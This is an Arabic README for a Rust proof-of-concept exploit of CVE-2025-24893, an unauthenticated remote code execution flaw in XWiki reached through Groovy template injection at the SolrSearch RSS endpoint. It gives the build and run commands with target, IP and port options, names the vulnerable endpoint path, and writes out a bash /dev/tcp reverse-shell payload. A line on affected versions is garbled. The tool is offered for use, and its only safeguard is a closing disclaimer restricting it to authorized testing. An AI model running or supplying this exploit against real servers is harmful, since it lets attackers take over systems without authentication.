
أداة إثبات مفهوم (PoC) لاستغلال الثغرة CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير موثقة في XWiki. تستغل عيب حقن قالب في نقطة نهاية SolrSearch عبر تنفيذ سكريبت Groovy.
إثبات المفهوم (PoC) لثغرة CVE-2025-24893، وهي ثغرة حرجة لـ تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في XWiki.
يستغل هذا الإكسبلويت حقن قالب Groovy في نقطة النهاية SolrSearch لتنفيذ أوامر عشوائية — بما في ذلك الصدف العكسية — دون الحاجة إلى مصادقة.
يسمح خلل في معالجة XWiki للمدخلات المُعدّة خصيصًا لنقطة النهاية SolrSearch RSS للمهاجمين بحقن كود Groovy في مسار العرض.
مما يتيح تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر كتل النص البرمجي {{groovy}}.
< 15.10.11>= 16.0.0 و < 16.4.115.10.1116.4.1حمِّل الإصدار:
أو ابنِ من المصدر:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
توجد حمولة صدفة عكسية معدة مسبقًا بهذا الشكل:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
هذا الكود مخصص للبحث الأمني التعليمي والمصرح به فقط.
لا تستخدم هذا الإكسبلويت ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
/bin/get/Main/SolrSearch?media=rss